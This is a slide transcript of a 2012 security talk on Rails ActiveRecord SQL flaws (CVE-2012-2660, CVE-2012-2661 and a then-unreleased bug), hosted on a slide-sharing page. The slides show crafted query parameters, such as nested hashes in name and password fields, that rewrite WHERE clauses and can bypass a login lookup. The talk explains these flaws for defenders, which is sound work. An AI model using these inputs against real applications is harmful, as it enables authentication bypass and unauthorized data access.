Upgrade to Pro — share decks privately, control downloads, hide ads and more …

"Recent Rails SQL Issues" - 2012

Avatar for Justin Collins Justin Collins
April 23, 2015
Programming
87
0

"Recent Rails SQL Issues" - 2012

Avatar for Justin Collins

Justin Collins

April 23, 2015

More Decks by Justin Collins

See All by Justin Collins
Continuous (Application) Security at DevOps Velocity
Avatar for Justin Collins presidentbeef
0
170
The Evolution of Rails Security
Avatar for Justin Collins presidentbeef
1
880
Brakeman RailsConf 2017 Lightning Talk
Avatar for Justin Collins presidentbeef
0
170
Practical Static Analysis for Continuous Application Security
Avatar for Justin Collins presidentbeef
0
240
"...But Doesn't Rails Take Care of Security for Me?"
Avatar for Justin Collins presidentbeef
1
490
Continuous Security with Practical Static Analysis
Avatar for Justin Collins presidentbeef
1
360
Security Automation at Twitter - Rise of the Machines
Avatar for Justin Collins presidentbeef
0
280
The World of Rails Security - RailsConf 2015
Avatar for Justin Collins presidentbeef
8
1.3k
Tales from the Crypt
Avatar for Justin Collins presidentbeef
1
280

Other Decks in Programming

See All in Programming
気づいたらRubyで100作品 ー クリエイティブコーディングが生活の一部になるまで / 100 Ruby Sketches Later: How Creative Coding Became Part of My Life
Avatar for chobishiba chobishiba
3
450
分析エージェント精度向上における データアナリストの役割
Avatar for oura_shoya oura_shoya
0
130
Skillは並べた。動かなかった。契約で繋いだ。— 65個のSkillから、自走する開発サイクルへ
Avatar for じゅん junholee
0
770
AI時代だからこそ「Bloc」を採用する価値があるのかもしれない
Avatar for takuro abe takuroabe
0
250
AIエージェントと協働するCLI開発 — BunとOpenClawで学んだこと
Avatar for よしこ yoshikouki
1
220
柔軟なPDFレイアウトエディタを支える型システム設計 — Discriminated UnionとConditional Typeの実践
Avatar for minako-ph minako__ph
4
1.1k
次世代リンターで探る、tsgo 時代における型認識カスタムルールの現実解
Avatar for Yuta Takahashi ytakahashii
3
1.2k
自動レビューエンジンの実装と運用 ~レビューのない世界へ~
Avatar for Kanato kurukuru1999
2
280
新規プロダクトを高速で生み出すハーネスエンジニアリング
Avatar for Ryohei Ikegami seanchas116
14
6.5k
CLIであることを活かしたGitHub Copilot CLI活用術 / GitHub Copilot CLI Pro Tips & Tricks
Avatar for Naoya.i nao_mk2
1
1.1k
Spec-Driven Development with AI-Agents: From High-Level Requirements to Working Software
Avatar for Anton Arhipov antonarhipov
2
380
Make SRE Operations Easier with Azure SRE Agent
Avatar for KAMEGAWA Kazushi kkamegawa
0
1.3k

Featured

See All Featured
The innovator’s Mindset - 
Leading Through an Era of Exponential Change - McGill University 2025
Avatar for Jean-Marc De Jonghe jdejongh
PRO
1
180
Faster Mobile Websites
Avatar for Dean Hume deanohume
310
31k
How to Get Subject Matter Experts Bought In and Actively Contributing to SEO & PR Initiatives.
Avatar for Liv Day livdayseo
0
130
Digital Projects Gone Horribly Wrong (And the UX Pros Who Still Save the Day) - Dean Schuster
Avatar for UX Y'all uxyall
0
1.5k
Agile that works and the tools we love
Avatar for Rasmus Luckow-Nielsen rasmusluckow
331
21k
The Hidden Cost of Media on the Web [PixelPalooza 2025]
Avatar for Tammy Everts tammyeverts
2
310
How GitHub (no longer) Works
Avatar for Zach Holman holman
316
150k
Building a A Zero-Code AI SEO Workflow
Avatar for Ian Lurie portentint
PRO
0
540
How To Speak Unicorn (iThemes Webinar)
Avatar for Michelle Schulp Hunt marktimemedia
1
470
How to Build an AI Search Optimization Roadmap - Criteria and Steps to Take #SEOIRL
Avatar for Aleyda Solis aleyda
1
2.1k
Max Prin - Stacking Signals: How International SEO Comes Together (And Falls Apart)
Avatar for Tech SEO Connect techseoconnect
PRO
0
170
ReactJS: Keep Simple. Everything can be a component!
Avatar for Pedro Nauck pedronauck
666
130k

Transcript

  1. Rails Vulnerabilities Last Week CVE-2012-2660 CVE-2012-2661

  2. CVE-2012-2660 Allows unexpected “IS NULL” in queries Affects Rails 2.x

    and 3.x

  3. ActiveRecord Query unless params[:name].nil? @user = User.where(:name => params[:name]) end

  4. Query Parameters ?name[] {"name"=>[nil]}

  5. ActiveRecord Query unless [nil].nil? @user = User.where(:name => [nil]) end

  6. Resulting SQL SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

  7. CVE-2012-2661 Allows some manipulation of WHERE clause via “dotted” query

    keys Affects Rails 3.x

  8. ActiveRecord Query User.where(:name => params[:name])

  9. ActiveRecord Query User.where("users.name" => params[:name])

  10. Query Parameters ?name[users.id]=1 {"name"=>{"users.id"=>"1"}}

  11. ActiveRecord Query User.where(:name => {"users.id" => "1"})

  12. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1

  13. Unreleased Vulnerability Allows some manipulation of WHERE clause via nested

    hashes in query values Affects 2.3.x and 3.x

  14. ActiveRecord Query User.where(:name => params[:name], :password => params[:password])

  15. Query Parameters ?name[users][id]=1&password[users][id]=1 {"name"=>{"users"=>{"id"=>"1"}}, "password" =>{"users"=>{"id"=>"1"}}}

  16. ActiveRecord Query User.where( :name => {"users"=>{"id"=>"1"}, :password => {"users"=>{"id"=>"1"} )

  17. Resulting SQL SELECT "users".* FROM "users" WHERE "users"." id" =

    1 AND "users"."id" = 1